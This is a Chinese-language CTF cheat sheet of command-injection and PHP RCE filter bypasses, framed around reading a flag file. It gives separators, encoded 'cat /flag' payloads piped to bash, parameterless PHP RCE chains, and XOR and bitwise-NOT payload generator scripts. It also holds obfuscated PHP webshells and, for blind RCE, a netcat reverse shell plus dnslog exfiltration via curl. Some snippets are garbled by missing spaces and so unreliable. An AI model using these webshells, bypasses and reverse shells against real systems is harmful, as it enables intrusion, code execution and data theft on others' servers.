空格过滤
替代:
<、<>、%20(space),%09(tab)、${IFS}、$IFS、$IFS$1、$IFS$9(最后的数字可以改)
命令分隔符
作用:https://blog.csdn.net/weixin_43847838/article/details/111602811
windows: %0a & | %1a
liunx: %0a %0d ; & | && ||(分号就是正常的连接两条语句)
花括号的别样用法
在Linux bash中还可以使用{OS COMMAND,ARGUMENT}来执行系统命令,比如{cat,flag}
拼接绕过
比如a=fl;b=ag;cat $a$b
编码绕过
1
2
3
| base64,例如 echo“Y2F0lC9mbGFn"|base64-dlbash ==> cat /flag
hex,例如 echo636174202f666c6167"|xxd -r-p|bash ==> cat /flag
oct,例如 $(printf"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==> cat /flag
|
单引号和双引号绕过
比如:ca“tflag 或ca””t flag
反斜杠绕过
比如: ca\t fl\ag
利用Shell特殊变量绕过
linux shell中$n表示传递给脚本或函数的参数,比如:ca$@tflas@q
长度限制
1
2
3
| linux下可以用1>a创建文件名为a的空文件
ls -t>test则会将目录按时间排序后写进test文件中
sh命令可以从一个文件中读取命令来执行
|
内联执行
1
2
| 命令替代,大部分Unix shell以及编程语言如Perl、PHP以及Ruby等都以成对的内联执行重音符(反引号)作指令替代
意思是以某一个指令的输出结果作为另一个指令的输入顶。echo "a`pwd”:echo “abcd $(pwd)
|
echo `ls`;
echo $(ls);
?><?=`ls`;
?><?=$(ls);
通配符
* 匹配任意长度任意字符
? 匹配任意单个字符
[list] 匹配指定范围内(list)任意单个字符,也可以是单个字符组成的集合
[^list] 匹配指定范围外的任意单个字符或字符集合([!list]同[^list])
{str1,str2} 匹配str1或者str2字符,也可以是集合
IFS 由<space>或<tab>
CR 由<enter>产生
! 执行history中的命令
常用如:cat f*
参数逃逸
比如var_dump(file_get_contents($_POST[‘a’]));&a=/
flag
无参数RCE
详解:https://blog.csdn.net/2301_76690905/article/details/133808536
1
2
3
4
5
6
7
8
9
| highlight_file(array_rand(array_flip(scandir(getcwd()))));
print_r(scandir(dirname(getcwd())));
print_r(scandir(next(scandir(getcwd()))));
show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));
show_source(array_rand(array_flip(scandir(chr(current(localtime(time(chdir(next(scandir(current(localeconv()))))))))))));
|
无字母数字RCE
详解:https://www.freebuf.com/articles/network/279563.html
异或脚本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
| word = input("Input word:")
payload = """"""
for i in word:
if i == "a":
payload += '("!"^"@")'
elif i == "b":
payload += '("!"^"@")'
elif i == "c":
payload += '("#"^"@")'
elif i == "d":
payload += '("$"^"@")'
elif i == "e":
payload += '("%"^"@")'
elif i == "f":
payload += '("&"^"@")'
elif i == "g":
payload += '''("'"^"@")'''
elif i == "h":
payload += '("("^"@")'
elif i == "i":
payload += '(")"^"@")'
elif i == "j":
payload += '("*"^"@")'
elif i == "k":
payload += '("+"^"@")'
elif i == "l":
payload += '(","^"@")'
elif i == "m":
payload += '("-"^"@")'
elif i == "n":
payload += '("."^"@")'
elif i == "o":
payload += '("/"^"@")'
elif i == "p":
payload += '("/"^"_")'
elif i == "q":
payload += '("/"^"^")'
elif i == "r":
payload += '("."^"\\")'
elif i == "s":
payload += '("-"^"^")'
elif i == "t":
payload += '("/"^"[")'
elif i == "u":
payload += '("("^"]")'
elif i == "v":
payload += '("("^"^")'
elif i == "w":
payload += '("("^"_")'
elif i == "x":
payload += '("&"^"^")'
elif i == "y":
payload += '''("'"^"^")'''
elif i == "z":
payload += '("&"^"\\")'
elif i == "A":
payload += '("!"^"`")'
elif i == "B":
payload += '("<"^"~")'
elif i == "C":
payload += '("#"^"`")'
elif i == "D":
payload += '("$"^"`")'
elif i == "E":
payload += '("%"^"`")'
elif i == "F":
payload += '("&"^"`")'
elif i == "G":
payload += '(":"^"}")'
elif i == "H":
payload += '("("^"`")'
elif i == "I":
payload += '(")"^"`")'
elif i == "J":
payload += '("*"^"`")'
elif i == "K":
payload += '("+"^"`")'
elif i == "L":
payload += '(","^"`")'
elif i == "M":
payload += '("-"^"`")'
elif i == "N":
payload += '("."^"`")'
elif i == "O":
payload += '("/"^"`")'
elif i == "P":
payload += '("@"^"~")'
elif i == "Q":
payload += '("-"^"|")'
elif i == "R":
payload += '("."^"|")'
elif i == "S":
payload += '("("^"{")'
elif i == "T":
payload += '("("^"|")'
elif i == "U":
payload += '("("^"}")'
elif i == "V":
payload += '("("^"~")'
elif i == "W":
payload += '(")"^"~")'
elif i == "X":
payload += '("#"^"{")'
elif i == "Y":
payload += '("$"^"{")'
elif i == "Z":
payload += '("$"^"~")'
else:
payload += i
print("payload:\n"+payload)
|
取反脚本:
1
2
3
4
5
6
7
8
9
10
| <?php
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
|
异或webshell:
1
2
3
| $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);
|
取反webshell(需进行url编码):
1
2
3
| $__=('>'>'<')+('>'>'<');$_=$__/$__;$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});$_____=_;$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});$_=$$_____;$____($_[$__]);
或:
$__=('>'>'<')+('>'>'<');$_=$__/$__;$____='';$___=瞰;$____.=~($___{$_});$___=和;$____.=~($___{$__});$___=和;$____.=~($___{$__});$___=的;$____.=~($___{$_});$___=半;$____.=~($___{$_});$___=始;$____.=~($___{$__});$_____=_;$___=俯;$_____.=~($___{$__});$___=瞰;$_____.=~($___{$__});$___=次;$_____.=~($___{$_});$___=站;$_____.=~($___{$_});$_=$$_____;$____($_[$__]);
|
无回显RCE
反弹shell
条件:具有nc
命令:nc -e /bin/bash ip port
然后再在服务器上开启端口接听
dnslog
发起一个dns请求需要通过linux中的ping命令或者curl命令
然后这里一个dnslog的利用平台:http://ceye.io/
作为命令的分隔符,然后发起curl请求,然后最后用反引号执行命令
文件下载
特定情况下压缩flag文件,并访问
